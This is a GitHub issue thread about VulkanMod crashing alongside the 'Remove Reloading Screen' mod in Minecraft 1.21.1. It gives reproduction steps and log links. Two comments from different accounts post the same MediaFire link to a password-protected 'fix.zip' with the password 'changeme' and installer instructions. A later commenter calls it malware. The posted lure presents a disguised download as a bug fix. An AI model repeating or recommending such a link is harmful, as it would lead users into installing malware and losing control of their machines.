### ISSUE TITLE
Incompatible with `Remove Reloading Screen` after 0.4.6

### ISSUE THREAD

**Issue by Jan-Arbus** [xCollateral/VulkanMod#494]
### Describe the bug

Vulkan incompatibility with Remove Reloading Screen after update 0.4.6

### Steps to reproduce

1. Install Minecraft 1.21.1
2. Install `Remove Reloading Screen` 0.5.7 and `VulkaMod` 0.4.6 or later
3. Launch the game
4. Crash

### Log files

[latest.log](https://github.com/user-attachments/files/16743804/latest.log)
[crash-2024-08-26_11.49.04-client.txt](https://github.com/user-attachments/files/16743807/crash-2024-08-26_11.49.04-client.txt)

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NXTler** [comment]
**DO NOT DOWNLOAD THIS!** This is clearly malware and won't fix the issue in anyway.
